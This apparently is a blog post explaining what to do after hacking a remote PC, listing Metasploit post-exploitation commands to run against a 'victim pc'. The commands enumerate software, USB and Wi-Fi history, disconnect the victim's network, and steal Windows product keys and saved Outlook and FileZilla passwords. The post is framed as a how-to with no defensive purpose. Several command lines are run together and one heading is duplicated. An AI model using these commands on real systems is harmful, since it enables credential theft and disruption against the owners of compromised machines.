What you can do after hacking remote pc?
(3)How to gather wireless current connection info?
msf post(filezilla_client_cred) >set session 1
If you know command line interface very well than you can operate remote pc as local pc.
Here I am listing some basic code of metasploit to operate remote pc from your terminal
But before that you have to exploit remote pc . For this purpose check my previous posts of �How to hack remote pc� here .
(1)How to gather installed application in victim pc.
Here are codes
msf >use post/windows/gather/enum_applications
msf post(enum_applications) >set session 1
msf post(enum_applications) >exploit
(2)How to gather usb drive history of victim pc?
Here are codes
msf >use post/windows/gather/usb_history
msf post(usb_history) >set session 1
msf post(usb_history) >exploit
(3)How to gather wireless current connection info?
Codes are below
msf >use post/windows/wlan/wlan_current_connection
msf post(wlan_current_connection) >set session 1
msf post(wlan_current_connection) >exploit
(4)How to find al connected wireless network of victim pc?
Codes are below
msf >use post/windows/wlan/wlan_bss_listmsf post(wlan_bss_list) >set session 1
msf post(wlan_bss_list) >exploit
(5)How to disconnect wireless network of victim pc?
Here are codes
msf >use post/windows/wlan/wlan_disconnectmsf post(wlan_disconnect) >set session 1
msf post(wlan_disconnect) >exploit
(6)How to get windows product key of victim pc?
Here are codes
msf >use post/windows/gather/enum_ms_product_keysmsf post(enum_ms_product_keys) >set session 1
msf post(enum_ms_product_keys) >exploit
(7)How to get save password of outlook?
Codes are below
msf >use post/windows/gather/credentials/outlookmsf post(outlook) >set session 1
msf post(outlook) >exploit
(8)How to get save password of filezill?
Codes are below
msf >use post/multi/gather/filezilla_client_credmsf post(filezilla_client_cred) >set session 1
msf post(filezilla_client_cred) >exploit
(9)How to detect installed os in victim virtual box?
Here are codes
msf >use post/multi/gather/enum_vboxmsf post(enum_vbox) >set session 1
msf post(enum_vbox) >exploit
0 nhận xét:
Đăng nhận xét